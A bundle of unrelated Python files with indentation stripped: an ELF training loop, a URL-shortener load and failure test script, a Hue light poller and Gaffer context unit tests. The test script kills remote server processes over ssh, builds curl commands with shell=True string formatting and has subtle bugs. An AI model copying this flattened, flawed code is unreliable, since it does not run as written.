# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
single_process.py
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import threading

from ..args_provider import ArgsProvider
import tqdm
class SingleProcessRun:
def __init__(self):
''' Initialization for SingleProcessRun. Accepted arguments:
``num_minibatch``,
``num_episode``,
``tqdm``
'''
self.args = ArgsProvider(
call_from = self,
define_args = [
("num_minibatch", 5000),
("num_episode", 10000),
("tqdm", dict(action="store_true")),
]
)
def setup(self, GC, episode_start=None, episode_summary=None):
''' Setup for SingleProcessRun.
Args:
GC(`GameContext`): Game Context
episode_start(func): operations to perform before each episode
            episode_summary(func): operations to summarize after each episode
'''
self.GC = GC
self.episode_summary = episode_summary
self.episode_start = episode_start
def run(self):
        ''' Main training loop. Initialize the Game Context and loop over the required episodes.
Call episode_start and episode_summary before and after each episode if necessary.
Visualize with a progress bar if ``tqdm`` is set.
Print training stats after each episode.
In the end, print summary for game context and stop it.
'''
self.GC.Start()
args = self.args
for k in range(args.num_episode):
if self.episode_start is not None:
self.episode_start(k)
if args.tqdm:
iterator = tqdm.trange(args.num_minibatch, ncols=50)
else:
iterator = range(args.num_minibatch)
for i in iterator:
self.GC.Run()
if self.episode_summary is not None:
self.episode_summary(k)
self.GC.PrintSummary()
self.GC.Stop()
def run_multithread(self):
''' Start training in a multithreaded environment '''
def train_thread():
args = self.args
for i in range(args.num_episode):
for k in range(args.num_minibatch):
if self.episode_start is not None:
self.episode_start(k)
if k % 500 == 0:
print("Receive minibatch %d/%d" % (k, args.num_minibatch))
self.GC.RunGroup("train")
# Print something.
self.episode_summary(i)
def actor_thread():
while True:
self.GC.RunGroup("actor")
self.GC.Start()
# Start the two threads.
train_th = threading.Thread(target=train_thread)
actor_th = threading.Thread(target=actor_thread)
train_th.start()
actor_th.start()
train_th.join()
actor_th.join()
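# A minimal usage sketch of SingleProcessRun (the GameContext instance `GC` and
# the summary hooks are assumptions, not defined in this file):
#
#   runner = SingleProcessRun()
#   runner.setup(GC,
#                episode_start=lambda k: print("episode", k, "starting"),
#                episode_summary=lambda k: print("episode", k, "done"))
#   runner.run()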
|
Tests.py
|
#!/usr/bin/python3
import random, string, subprocess
from subprocess import check_output
from subprocess import Popen, PIPE
import random
import time
import logging
import threading
import os
import datetime
import configparser
import requests
mainProxyHost = "10.11.12.115"
mainProxyPort = 80
shortList = []
# Letter range
random.seed(30)
#------- UTILITY FUNCTIONS ------
# generates the shorts
def generateShorts(start, end ,total):
global shortList
shortList = []
for i in range(total):
s = str(random.randint(start, end))
shortList.append(s)
# gets time in milliseconds
def getMillSeconds(start, end):
time_diff = (end - start)
execution_time = time_diff.total_seconds() * 1000
return execution_time
#------- SINGLE TEST FUNCTIONS ------
def singlePutRequestTest():
print("\nSINGLE REQUEST TIME FOR PUT")
print("\tAssuming this is a valid request and will go through")
shortResource = "hello2"
longResource = "world"
request = "http://" + mainProxyHost + ":" + str(mainProxyPort) + "/?short="+ shortResource+"&long="+longResource
p = Popen(['curl', '-X', "PUT", request], stdin=PIPE, stdout=PIPE, stderr=PIPE)
start = datetime.datetime.now()
output, err = p.communicate(b"input data that is passed to subprocess' stdin")
end = datetime.datetime.now()
print("singlePutRequest Execution time: %d", getMillSeconds(start, end))
print(output)
def singleGetRequestTest():
print("\nSINGLE REQUEST TIME FOR GET")
print("\tAssuming this is a valid request and will go through")
shortResource = "hello"
request = "http://" + mainProxyHost + ":" + str(mainProxyPort) + "/" + shortResource
p = Popen(['curl','-X', 'GET' ,request], stdin=PIPE, stdout=PIPE, stderr=PIPE)
start = datetime.datetime.now()
output, err = p.communicate(b"input data that is passed to subprocess' stdin")
end = datetime.datetime.now()
logging.info("singleGetRequestTest Execution Time: %d", getMillSeconds(start, end))
print(output)
#------- STRESS TEST FUNCTIONS ------
def stressPutRequest():
print("\nSTRESS REQUEST TIME FOR PUT SINGLE THEREAD: " + str(len(shortList)) + " REQUESTS" )
print("\tAssuming these are valid request and will go through")
start = datetime.datetime.now()
for short in shortList:
longResource = "world"
request = "curl -X PUT 'http://{}:{}/?short={}&long={}'".format(mainProxyHost, str(mainProxyPort), short, longResource)
subprocess.call(request, shell=True)
end = datetime.datetime.now()
print("StressPutRequest Test Execution Time: %dms", getMillSeconds(start, end))
print(end - start)
def stressGetRequest():
logging.info("\nSTRESS REQUEST TIME FOR PUT SINGLE THEREAD: " + str(len(shortList)) + " REQUESTS" )
logging.info("\tAssuming these are valid request and will go through")
start = datetime.datetime.now()
for short in shortList:
request = "curl -X GET 'http://{}:{}/{}'".format(mainProxyHost, str(mainProxyPort), short)
subprocess.call(request, shell=True)
end = datetime.datetime.now()
print("Total Execution time: %d ms", getMillSeconds(start, end))
# ------ Threaded Put Test -------------
def thread_function_Put(start, end):
longResource = "world"
i = start
while i < end:
request = "curl -X PUT 'http://{}:{}/?short={}&long={}'".format(mainProxyHost, str(mainProxyPort), shortList[int(i)], longResource)
subprocess.call(request, shell=True)
i += 1
def threadedPutTest(threads):
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt="%H:%M:%S")
threadsList = []
requestsPerThread = len(shortList)/ threads
i = 0
while i < len(shortList):
start = i
end = i + requestsPerThread
print("start " + str(start) + " end " + str(end))
t = threading.Thread(target=thread_function_Put, args=[start, end])
threadsList.append(t)
i += requestsPerThread
start = datetime.datetime.now()
for t in threadsList:
t.start()
for t in threadsList:
t.join()
end = datetime.datetime.now()
logging.info("Total taken %d", getMillSeconds(start,end))
# ------ Threaded Get Test -------------
def thread_function_Get(start, end):
i = start
while i < end:
url = "http://" + mainProxyHost + ":" + str(mainProxyPort) + "/" + shortList[int(i)]
request = "curl -X GET 'http://{}:{}/{}'".format(mainProxyHost, str(mainProxyPort), shortList[int(i)])
requests.get(url)
#subprocess.call(request, shell=True)
i += 1
def insertShortList(longR, index):
url = "http://" + mainProxyHost + ":" + str(mainProxyPort) + "/" + "?short=" + shortList[int(index)] + "&long=" + longR
request = ['curl', '-X', 'PUT', url]
subprocess.run(request, stdout="/dev/null")
def threadedGetTest(threads):
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt="%H:%M:%S")
threadsList = []
requestsPerThread = len(shortList)/ threads
i = 0
while i < len(shortList):
start = i
end = i + requestsPerThread
t = threading.Thread(target=thread_function_Get, args=[start, end])
threadsList.append(t)
i += requestsPerThread
start = datetime.datetime.now()
for t in threadsList:
t.start()
for t in threadsList:
t.join()
end = datetime.datetime.now()
logging.info("Total taken %d", getMillSeconds(start, end))
# ------ Threaded Mixed Test ----------
allRequests = []
def threadMixTest(start, end):
i = start
while i < end:
subprocess.run(allRequests[i], stdout="/dev/null")
i += 1
def threadedMixTest(threads):
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt="%H:%M:%S")
threadsList = []
requestsPerThread = len(allRequests)/ threads
i = 0
while i < len(allRequests):
start = i
end = i + requestsPerThread
t = threading.Thread(target=threadMixTest, args=[start, end])
threadsList.append(t)
i += requestsPerThread
start = datetime.datetime.now()
for t in threadsList:
t.start()
for t in threadsList:
t.join()
end = datetime.datetime.now()
totalTime = getMillSeconds(start, end)
    througPut = len(allRequests) / (end - start).total_seconds()  # requests per second
    logging.info("throughPut: %f req/s, time(ms): %d", througPut, totalTime)
# ------------------ Availability/Failure Tests ------------
def urlFailureTest():
with open('../config.properties') as f:
file_content = '[config]\n' + f.read()
config = configparser.RawConfigParser()
config.read_string(file_content)
urlHosts = config.get('config', 'url.hostsAndPorts').split(',')
urlProxyHost = config.get('config', 'proxy.url.host')
urlProxyPort = config.get('config', 'proxy.url.port')
request = ['curl', 'http://' + urlProxyHost + ":" + urlProxyPort + '/hello']
    result = subprocess.run(request)
    if result.returncode == 0:
        logging.info("First request was successful")
logging.info("Killing the second URLServer at %s", urlHosts[1])
targetURLHost = urlHosts[1].split(':')[0]
targetURLPort = urlHosts[1].split(':')[1]
subprocess.run(['ssh', targetURLHost, 'fuser -k' + targetURLPort + '/tcp'])
    result = subprocess.run(request)
    if result.returncode == 0:
        logging.info("Second request was successful")
def dbFailureTest():
with open('../config.properties') as f:
file_content = '[config]\n' + f.read()
config = configparser.RawConfigParser()
config.read_string(file_content)
urlProxyHost = config.get('config', 'proxy.url.host')
urlProxyPort = config.get('config', 'proxy.url.port')
dbhosts = config.get('config', 'db.hostsAndPorts').split(',')
request = ['curl', 'http://' + urlProxyHost + ":" + urlProxyPort + '/hello']
    result = subprocess.run(request)
    if result.returncode == 0:
        logging.info("First request was successful")
logging.info("Killing the second DBServer at %s", dbhosts[1])
targetDBHost = dbhosts[1].split(':')[0]
targetDBPort = dbhosts[1].split(':')[1]
subprocess.run(['ssh', targetDBHost, 'fuser -k' + targetDBPort + '/tcp'])
logging.info("Running request again")
    result = subprocess.run(request)
    if result.returncode == 0:
        logging.info("Second request was successful")
if __name__ == "__main__":
generateShorts(3000,4000,1000)
#singlePutRequestTest()
#singleGetRequestTest()
#stressPutRequest()
#stressGetRequest()
#threadedPutTest(12)
threadedGetTest(5)
|
RoomLightOn.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "MPZinke"
##########################################################################################
#
# created by: MPZinke
# on 2020.04.05
#
# DESCRIPTION:
# BUGS:
# FUTURE: - Expand such that each light is its own object
#
##########################################################################################
from datetime import datetime, timedelta
from requests import get
from time import sleep
from threading import Thread
from Definitions import *
class HueRoom:
def __init__(self, lights, wait=300):
self.lights = lights
self.any_light_is_on = False
self.has_not_ended = True
self.sleep_until_time = datetime.now()
self.thread = Thread(target=self.thread_loop)
self.wait = wait
def end(self):
self.has_not_ended = False
def sleep(self, sleep_until_time):
        if isinstance(sleep_until_time, int):
self.sleep_until_time = datetime.now() + timedelta(seconds=sleep_until_time)
elif type(sleep_until_time) == type(self.sleep_until_time):
self.sleep_until_time = sleep_until_time
def start(self):
self.thread.start()
def thread_loop(self):
while self.has_not_ended:
while datetime.now() < self.sleep_until_time: sleep(30)
try:
request_json = self.request()
self.decode_request(request_json)
except Exception as error:
print(error)
self.decode_request()
sleep(self.wait)
def check_connection(self):
url = "http://%s/api/%s/lights" % (BRIDGE_IP_ADDRESS, USER_NAME)
request = get(url=url).json()
return request
def check_if_any_light_is_on(self):
for light in self.lights:
if self.light_is_on(light): return True
return False
def light_is_on(self, light):
url = "http://%s/api/%s/lights/%d" % (BRIDGE_IP_ADDRESS, USER_NAME, light)
request = get(url=url).json()
if "state" in request and request["state"]["reachable"] and request["state"]["on"]:
return True
return False
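# A minimal usage sketch of HueRoom (the light ids and wait interval are assumptions):
#   room = HueRoom(lights=[1, 2, 3], wait=300)
#   room.start()       # begin the background polling thread
#   room.sleep(3600)   # pause the loop for an hour
#   room.end()         # let the loop exit after its current iteration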
|
ContextTest.py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import weakref
import imath
import IECore
import Gaffer
import GafferTest
class ContextTest( GafferTest.TestCase ) :
def testFrameAccess( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c["frame"], 1.0 )
c.setFrame( 10.5 )
self.assertEqual( c.getFrame(), 10.5 )
self.assertEqual( c["frame"], 10.5 )
def testChangedSignal( self ) :
c = Gaffer.Context()
changes = []
def f( context, name ) :
self.failUnless( context.isSame( c ) )
changes.append( ( name, context.get( name, None ) ) )
cn = c.changedSignal().connect( f )
c["a"] = 2
self.assertEqual( changes, [ ( "a", 2 ) ] )
c["a"] = 3
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ) ] )
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )
# when an assignment makes no actual change, the signal should not
# be triggered again.
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )
# Removing variables should also trigger the changed signal.
del changes[:]
c.remove( "a" )
self.assertEqual( changes, [ ( "a", None ) ] )
del c["b"]
self.assertEqual( changes, [ ( "a", None ), ( "b", None ) ] )
def testTypes( self ) :
c = Gaffer.Context()
c["int"] = 1
self.assertEqual( c["int"], 1 )
self.assertEqual( c.get( "int" ), 1 )
c.set( "int", 2 )
self.assertEqual( c["int"], 2 )
self.failUnless( isinstance( c["int"], int ) )
c["float"] = 1.0
self.assertEqual( c["float"], 1.0 )
self.assertEqual( c.get( "float" ), 1.0 )
c.set( "float", 2.0 )
self.assertEqual( c["float"], 2.0 )
self.failUnless( isinstance( c["float"], float ) )
c["string"] = "hi"
self.assertEqual( c["string"], "hi" )
self.assertEqual( c.get( "string" ), "hi" )
c.set( "string", "bye" )
self.assertEqual( c["string"], "bye" )
self.failUnless( isinstance( c["string"], basestring ) )
c["v2i"] = imath.V2i( 1, 2 )
self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
self.assertEqual( c.get( "v2i" ), imath.V2i( 1, 2 ) )
c.set( "v2i", imath.V2i( 1, 2 ) )
self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
self.failUnless( isinstance( c["v2i"], imath.V2i ) )
c["v3i"] = imath.V3i( 1, 2, 3 )
self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
self.assertEqual( c.get( "v3i" ), imath.V3i( 1, 2, 3 ) )
c.set( "v3i", imath.V3i( 1, 2, 3 ) )
self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
self.failUnless( isinstance( c["v3i"], imath.V3i ) )
c["v2f"] = imath.V2f( 1, 2 )
self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
self.assertEqual( c.get( "v2f" ), imath.V2f( 1, 2 ) )
c.set( "v2f", imath.V2f( 1, 2 ) )
self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
self.failUnless( isinstance( c["v2f"], imath.V2f ) )
c["v3f"] = imath.V3f( 1, 2, 3 )
self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
self.assertEqual( c.get( "v3f" ), imath.V3f( 1, 2, 3 ) )
c.set( "v3f", imath.V3f( 1, 2, 3 ) )
self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
self.failUnless( isinstance( c["v3f"], imath.V3f ) )
def testCopying( self ) :
c = Gaffer.Context()
c["i"] = 10
c2 = Gaffer.Context( c )
self.assertEqual( c2["i"], 10 )
c["i"] = 1
self.assertEqual( c["i"], 1 )
self.assertEqual( c2["i"], 10 )
def testEquality( self ) :
c = Gaffer.Context()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
self.failIf( c != c2 )
c["somethingElse"] = 1
self.assertNotEqual( c, c2 )
self.failIf( c == c2 )
def testCurrent( self ) :
# if nothing has been made current then there should be a default
# constructed context in place.
c = Gaffer.Context.current()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
# and we should be able to change that using the with statement
c2["something"] = 1
with c2 :
self.failUnless( Gaffer.Context.current().isSame( c2 ) )
self.assertEqual( Gaffer.Context.current()["something"], 1 )
# and bounce back to the original
self.failUnless( Gaffer.Context.current().isSame( c ) )
def testCurrentIsThreadSpecific( self ) :
c = Gaffer.Context()
self.failIf( c.isSame( Gaffer.Context.current() ) )
def f() :
self.failIf( c.isSame( Gaffer.Context.current() ) )
with Gaffer.Context() :
pass
with c :
self.failUnless( c.isSame( Gaffer.Context.current() ) )
t = threading.Thread( target = f )
t.start()
t.join()
self.failUnless( c.isSame( Gaffer.Context.current() ) )
self.failIf( c.isSame( Gaffer.Context.current() ) )
def testThreading( self ) :
# for good measure, run testCurrent() in a load of threads at
# the same time.
threads = []
for i in range( 0, 1000 ) :
t = threading.Thread( target = self.testCurrent )
t.start()
threads.append( t )
for t in threads :
t.join()
def testSetWithObject( self ) :
c = Gaffer.Context()
v = IECore.StringVectorData( [ "a", "b", "c" ] )
c.set( "v", v )
self.assertEqual( c.get( "v" ), v )
self.failIf( c.get( "v" ).isSame( v ) )
self.assertEqual( c["v"], v )
self.failIf( c["v"].isSame( v ) )
def testGetWithDefault( self ) :
c = Gaffer.Context()
self.assertRaises( RuntimeError, c.get, "f" )
self.assertEqual( c.get( "f", 10 ), 10 )
c["f"] = 1.0
self.assertEqual( c.get( "f" ), 1.0 )
def testReentrancy( self ) :
c = Gaffer.Context()
with c :
self.failUnless( c.isSame( Gaffer.Context.current() ) )
with c :
self.failUnless( c.isSame( Gaffer.Context.current() ) )
def testLifeTime( self ) :
c = Gaffer.Context()
w = weakref.ref( c )
self.failUnless( w() is c )
with c :
pass
del c
self.failUnless( w() is None )
def testWithBlockReturnValue( self ) :
with Gaffer.Context() as c :
self.failUnless( isinstance( c, Gaffer.Context ) )
self.failUnless( c.isSame( Gaffer.Context.current() ) )
def testSubstitute( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "$a/$b/something.###.tif" ), "apple/bear/something.020.tif" )
self.assertEqual( c.substitute( "$a/$dontExist/something.###.tif" ), "apple//something.020.tif" )
self.assertEqual( c.substitute( "${badlyFormed" ), "" )
def testSubstituteTildeInMiddle( self ) :
c = Gaffer.Context()
self.assertEqual( c.substitute( "a~b" ), "a~b" )
def testSubstituteWithMask( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "~", c.Substitutions.AllSubstitutions & ~c.Substitutions.TildeSubstitutions ), "~" )
self.assertEqual( c.substitute( "#", c.Substitutions.AllSubstitutions & ~c.Substitutions.FrameSubstitutions ), "#" )
self.assertEqual( c.substitute( "$a/${b}", c.Substitutions.AllSubstitutions & ~c.Substitutions.VariableSubstitutions ), "$a/${b}" )
self.assertEqual( c.substitute( "\\", c.Substitutions.AllSubstitutions & ~c.Substitutions.EscapeSubstitutions ), "\\" )
self.assertEqual( c.substitute( "\\$a", c.Substitutions.AllSubstitutions & ~c.Substitutions.EscapeSubstitutions ), "\\apple" )
self.assertEqual( c.substitute( "#${a}", c.Substitutions.AllSubstitutions & ~c.Substitutions.FrameSubstitutions ), "#apple" )
self.assertEqual( c.substitute( "#${a}", c.Substitutions.NoSubstitutions ), "#${a}" )
def testFrameAndVariableSubstitutionsAreDifferent( self ) :
c = Gaffer.Context()
c.setFrame( 3 )
# Turning off variable substitutions should have no effect on '#' substitutions.
self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
self.assertEqual( c.substitute( "###.$frame", c.Substitutions.AllSubstitutions & ~c.Substitutions.VariableSubstitutions ), "003.$frame" )
# Turning off '#' substitutions should have no effect on variable substitutions.
self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
self.assertEqual( c.substitute( "###.$frame", c.Substitutions.AllSubstitutions & ~c.Substitutions.FrameSubstitutions ), "###.3" )
def testSubstitutions( self ) :
c = Gaffer.Context
self.assertEqual( c.substitutions( "a"), c.Substitutions.NoSubstitutions )
self.assertEqual( c.substitutions( "~/something"), c.Substitutions.TildeSubstitutions )
self.assertEqual( c.substitutions( "$a"), c.Substitutions.VariableSubstitutions )
self.assertEqual( c.substitutions( "${a}"), c.Substitutions.VariableSubstitutions )
self.assertEqual( c.substitutions( "###"), c.Substitutions.FrameSubstitutions )
self.assertEqual( c.substitutions( "\#"), c.Substitutions.EscapeSubstitutions )
self.assertEqual( c.substitutions( "${a}.###"), c.Substitutions.VariableSubstitutions | c.Substitutions.FrameSubstitutions )
def testHasSubstitutions( self ) :
c = Gaffer.Context()
self.assertFalse( c.hasSubstitutions( "a" ) )
self.assertTrue( c.hasSubstitutions( "~something" ) )
self.assertTrue( c.hasSubstitutions( "$a" ) )
self.assertTrue( c.hasSubstitutions( "${a}" ) )
self.assertTrue( c.hasSubstitutions( "###" ) )
def testNames( self ) :
c = Gaffer.Context()
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond" ] ) )
c["a"] = 10
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
cc = Gaffer.Context( c )
self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
cc["b"] = 20
self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a", "b" ] ) )
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
self.assertEqual( cc.names(), cc.keys() )
def testManyContexts( self ) :
GafferTest.testManyContexts()
def testGetWithAndWithoutCopying( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
# we should be getting a copy each time by default
self.assertFalse( c["test"].isSame( c["test"] ) )
# meaning that if we modify the returned value, no harm is done
c["test"].append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2 ] ) )
# if we ask nicely, we can get a reference to the internal
# value without any copying.
self.assertTrue( c.get( "test", _copy=False ).isSame( c.get( "test", _copy=False ) ) )
# but then if we modify the returned value, we are changing the
# context itself too. this should be avoided - we're just doing it
# here to test that we are indeed referencing the internal value.
c.get( "test", _copy=False ).append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2, 10 ] ) )
def testGetWithDefaultAndCopyArgs( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
self.assertTrue( c.get( "test", 10, _copy=False ).isSame( c.get( "test", 20, _copy=False ) ) )
self.assertTrue( c.get( "test", defaultValue=10, _copy=False ).isSame( c.get( "test", defaultValue=20, _copy=False ) ) )
def testCopyWithSharedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# both contexts reference the same object, but c2 at least owns
# a reference to its values, and can be used after c1 has been
# deleted.
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r + 1 )
del c1
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
def testCopyWithBorrowedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# check that c2 doesn't own a reference
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
# make sure we delete c2 before we delete c1
del c2
# check that we're ok to access c1 after deleting c2
self.assertEqual( c1["testInt"], 20 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
def testSetOnBorrowedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
def testSetOnSharedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
def testSetOnSharedContextsReleasesReference( self ) :
c1 = Gaffer.Context()
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1.get( "testIntVector", _copy=False ).refCount(), r )
def testHash( self ) :
c = Gaffer.Context()
hashes = [ c.hash() ]
c["test"] = 1
hashes.append( c.hash() )
c["test"] = 2
hashes.append( c.hash() )
c["test2"] = "test2"
hashes.append( c.hash() )
self.assertEqual( len( hashes ), 4 )
self.assertEqual( len( set( str( h ) for h in hashes ) ), len( hashes ) )
c["test2"] = "test2" # no change
self.assertEqual( c.hash(), hashes[-1] )
def testChanged( self ) :
c = Gaffer.Context()
c["test"] = IECore.StringVectorData( [ "one" ] )
h = c.hash()
cs = GafferTest.CapturingSlot( c.changedSignal() )
d = c.get( "test", _copy = False ) # dangerous! the context won't know if we make changes
d.append( "two" )
self.assertEqual( c.get( "test" ), IECore.StringVectorData( [ "one", "two" ] ) )
self.assertEqual( len( cs ), 0 )
c.changed( "test" ) # let the context know what we've been up to
self.assertEqual( len( cs ), 1 )
self.assertEqual( cs[0], ( c, "test" ) )
self.assertNotEqual( c.hash(), h )
def testHashIgnoresUIEntries( self ) :
c = Gaffer.Context()
h = c.hash()
c["ui:test"] = 1
self.assertEqual( h, c.hash() )
def testManySubstitutions( self ) :
GafferTest.testManySubstitutions()
def testManyEnvironmentSubstitutions( self ) :
GafferTest.testManyEnvironmentSubstitutions()
def testEscapedSubstitutions( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "\${a}.\$b" ), "${a}.$b" )
self.assertEqual( c.substitute( "\~" ), "~" )
self.assertEqual( c.substitute( "\#\#\#\#" ), "####" )
# really we're passing \\ to substitute and getting back \ -
# the extra slashes are escaping for the python interpreter.
self.assertEqual( c.substitute( "\\\\" ), "\\" )
self.assertEqual( c.substitute( "\\" ), "" )
self.assertTrue( c.hasSubstitutions( "\\" ) ) # must return true, because escaping affects substitution
self.assertTrue( c.hasSubstitutions( "\\\\" ) ) # must return true, because escaping affects substitution
def testRemove( self ) :
c = Gaffer.Context()
c["a"] = "apple"
c["b"] = "bear"
c["c"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a", "b", "c", "frame", "framesPerSecond" ] ) )
# test Context.remove()
c.remove( "a" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "c", "frame", "framesPerSecond" ] ) )
h = c.hash()
# test Context.__delitem__()
del c[ "c" ]
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "frame", "framesPerSecond" ] ) )
self.assertEqual( c["b"], "bear" )
def testRemoveMatching( self ) :
c = Gaffer.Context()
c["a_1"] = "apple"
c["a_2"] = "apple"
c["b_1"] = "bear"
c["b_2"] = "bear"
c["c_1"] = "cat"
c["c_2"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a_1", "a_2", "b_1", "b_2", "c_1", "c_2", "frame", "framesPerSecond" ] ) )
# test Context.removeMatching()
